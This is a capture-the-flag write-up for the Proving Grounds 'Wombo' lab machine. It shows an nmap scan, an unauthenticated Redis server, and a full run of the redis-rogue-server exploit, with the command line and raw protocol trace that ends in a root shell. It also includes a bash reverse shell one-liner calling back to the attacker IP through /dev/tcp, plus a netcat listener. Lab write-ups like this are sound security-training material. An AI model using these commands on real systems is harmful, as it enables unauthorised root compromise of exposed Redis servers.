Proving grounds Practice - Wombo CTF writeup.
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http nginx 1.10.3
6379/tcp open redis Redis key-value store 5.0.9
8080/tcp open http-proxy
27017/tcp open mongod?
6379/tcp - open - redis - Redis key-value store 5.0.9
The redis server is vulnerable to Remote code Execution vulnerability.
Connect to redis server to check if it is password protected or not.
naveenj@hackerspace:[09:32]~/proving_grounds/Wombo$ redis-cli -h 192.168.211.69
192.168.211.69:6379> module list
(empty array)
(0.53s)
192.168.211.69:6379>
The server is not password protected, clone the GitHub exploit and follow below steps.
After cloning the repository direct to /redis-rogue-server/RedisModulesSDK/exp folder and run sudo make. The exp.so file will be created and copy the file to the folder where the python exploit code is exists.
Exploitation
naveenj@hackerspace:[09:53]~/proving_grounds/Wombo/redis-rogue-server$ python redis-rogue-server.py --rhost 192.168.211.69 --rport 6379 --lhost 192.168.45.243 --lport 80 --exp=exp.so -v
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 192.168.211.69:6379
[info] SERVER 192.168.45.243:80
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.243\r\n$2\r\n80\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n73a8ee0c379f25d3a0d876642411d68a61500ca3\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$47856\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xb3\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'+OK\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'$1\r\ne\r\n'
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] id;whoami;
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$10\r\nid;whoami;\r\n'
[->] b'$45\r\n\x08uid=0(root) gid=0(root) groups=0(root)\nroot\n\r\n'
[>>]uid=0(root) gid=0(root) groups=0(root)
[>>] root
Foothold Obtained
Reverse Shell
Bash reverse shell.
bash -c 'sh -i >& /dev/tcp/192.168.45.243/8080 0>&1';
Make sure the netcat listener is running.
veenj@hackerspace:[09:51]~/proving_grounds/Wombo/redis-rogue-server$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.211.69] 54064
sh: 0: can't access tty; job control turned off
# which python
/usr/bin/python
# python -c 'import pty; pty.spawn("/bin/bash")'
root@wombo:/#
Thanks for reading!
For more insights and updates, follow me on Twitter: @thevillagehacker.